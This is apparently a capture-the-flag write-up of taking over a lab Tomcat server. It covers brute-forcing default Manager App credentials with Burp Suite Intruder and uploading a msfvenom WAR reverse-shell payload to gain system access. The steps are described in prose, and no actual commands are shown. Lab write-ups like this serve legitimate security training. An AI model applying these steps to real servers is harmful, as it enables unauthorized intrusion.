By: Nicholas Werner
Starting off with nmap scans.
Only port 8080 is open and it is running Apache Tomcat so I want to take a look at that.
It appears that it is running the default webpage which is good because that means that it’s probably running default credentials as well. So I search Apache Tomcat default credentials on Google to see what I can find.
And I found a GitHub page with a list of 25 default usernames/passwords.
I turn on Burpsuite to capture some traffic
Go to Preferences in the side bar of your browser, scroll down to Network Proxy and click Settings. Here you can configure your settings like below.
Make sure that Intercept is on in the proxy tab in Burpsuite. Click refresh on the Apache Tomcat webpage and you should intercept this request below. Forward it.
Click Manager App in the Apache Tomcat webpage. Enter a default username and password and look at Burpsuite which has intercepted the request.
Right click on the request and click Send to Decoder.
Highlight the Base64 text as shown, click Decode as, Click Base64. This will give you a new window below that will have decoded that string.
You can then go back to the Proxy tab, right click on the request and click Send to Repeater. This will show you that the response sent back a 401 Unauthorized which means that set of credentials is incorrect.
Now I want to try to a brute force attack. I type gedit tomcat.txt to create a new file called tomcat.txt where I can store those credentials that I found earlier on GitHub.
I copy and paste those credentials into the txt file.
After I used the Decoder tab earlier and saw that we can decode the Base64 string, I saw that the format was tomcat:tomcat so I want to put all of the usernames/passwords in that format so that Burpsuite can help me to brute force the login.
This just shows how you can change text into Base64.
This is the script that I used to make my whole list in tomcat.txt into Base64
Send the previous request to the Intruder tab, click the Positions tab inside the Intruder tab, highlight the Base64 string as shown below, and click Add on the right hand side.
Go to the Payloads tab under the Intruder tab, paste your Base64 strings that you just created from your script, and uncheck the URL encode these characters box.
Click Start attack and when it is finished you will see this screen below. As you can see, one of the default credentials worked and sent us back a 200 OK.
Disable your proxy settings in your browser like below since we are done with Burpsuite.
Go back to the Apache Tomcat webpage and enter in the credentials that we just found to work.
I can now see that we are able to upload a WAR file so I want to search on Google to see if we can find any WAR file exploits.
I found a site about msfvenom and Metasploit payloads and I can see that there is a WAR payload so I copy and paste that into a command prompt with my LHOST and LPORT.
Once I type the command below I have set up a listener on port 4444.
I go back to the Apache Tomcat webpage and click Browse under the “WAR file to deploy” section to select a WAR file to upload.
Now I can see that shell.war was uploaded. Click on this file and the listener will pick up a connection.
The listener picked up a connection.
Now I have system access.
type “2 for the price of 1.txt”
I have found both flags.